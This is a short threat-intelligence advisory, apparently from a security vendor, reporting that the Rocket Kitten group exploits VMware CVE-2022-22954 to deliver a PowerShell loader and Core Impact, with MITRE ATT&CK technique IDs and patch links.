Newly patched VMware vulnerability exploited by Iranian espionage group, Rocket Kitten

Threat Level – Amber | Vulnerability Report
Download PDF

THREAT LEVEL: Red.

For a detailed advisory, download the pdf file here

An Iranian cyber espionage gang known as Rocket Kitten has began delivering the Core Impact penetration testing tool on susceptible computers by exploiting a newly fixed severe vulnerability in VMware Workspace ONE Access/Identity Manager program.

Threat actors use the VMWare Identity Manager Service flaw (CVE-2022-22954) to acquire initial access to a target system, then install a PowerShell stager to download the next stage payload, nicknamed PowerTrash Loader. The PowerTrash Loader is a 40,000-line PowerShell script that has been substantially obfuscated. PowerTrash Downloader introduces the penetration testing framework Core Impact to memory at the end of the attack chain.

The MITRE ATT&CK TTPs commonly used by Rocket Kitten are:

TA0001: Initial Access       

TA0002: Execution       

TA0006: Credential Access       

TA0009: Collection       

TA0011: Command and Control

T1059 – Command and Scripting Interpreter

T1189 – Drive-by Compromise

T1555.003: Credentials from Password Stores: Credentials from Web Browsers

T1105: Ingress Tool Transfer

T1056.001: Input Capture: Keylogging

T1566.001: Phishing: Spearphishing Attachmet

T1566.003: Phishing: Spearphishing via Servicen

T1204.002: User Execution: Malicious File

Actor Details

Vulnerability Details

Indicators of Compromise (IoCs)

Patch Links

https://www.vmware.com/security/advisories/VMSA-2022-0011.html

References

https://blog.morphisec.com/vmware-identity-manager-attack-backdoor

What’s new on HivePro

Get through updates and upcoming events, and more directly in your inbox

Cyber Horizons 2025

What Last Year’s Attacks Reveal About Today’s Risks

Watch the Webinar on-demand and get a FREE copy of our Cyber Horizons 2025 report.

Our Speakers
Speaker 1

Prateek Bhajanka Global Field CISO & Former Gartner Analyst Hive Pro Inc.

Speaker 2

Ankit Mani Manager Threat Intel HiveForce Labs

Speaker 3

Sreevani Tonipe Senior Threat Researcher HiveForce Labs